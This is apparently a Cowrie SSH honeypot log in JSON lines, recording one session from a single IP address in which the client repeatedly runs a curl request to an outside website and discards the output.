{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.129029Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.179357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.180317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.222409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.223661Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.272830Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.273824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.311075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.312122Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.348890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.350133Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.388156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.389158Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.425955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.426901Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.463836Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.465650Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.502870Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.504635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.541184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.542176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.589777Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.591059Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.658605Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.659833Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.696673Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.697728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.735103Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.736168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.774533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.775653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.813967Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.814991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.862736Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.863931Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.900938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.901882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.943696Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.945230Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:45.985669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:45.986628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.046453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.047531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.087293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.088508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.133674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.134627Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.182044Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.183063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.231296Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.232582Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.269905Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.270878Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.308745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.309701Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.346955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.348237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.385049Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.386033Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.424220Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.425168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.471887Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.473102Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.510775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.511965Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.549344Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.550357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.587451Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.588606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.626826Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.628016Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.665308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.666342Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.703472Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.704570Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.742323Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.743509Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.781853Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.783224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.821890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.822892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.869748Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.870987Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.908069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.909408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.950565Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.951590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:46.988137Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:46.989614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.026626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.027784Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.067749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.068887Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.105843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.106876Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.145204Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.146211Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.182832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.183797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.221646Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.222563Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.269727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.270770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.308041Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.309189Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.346522Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.347949Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.386334Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.387456Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.424371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.425478Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.462536Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.463812Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.500835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.501760Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.539217Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.540223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.577576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.578737Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.616250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.617267Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.665213Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.666223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.703295Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.704259Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.741690Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.742759Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.780386Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.781585Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.820031Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
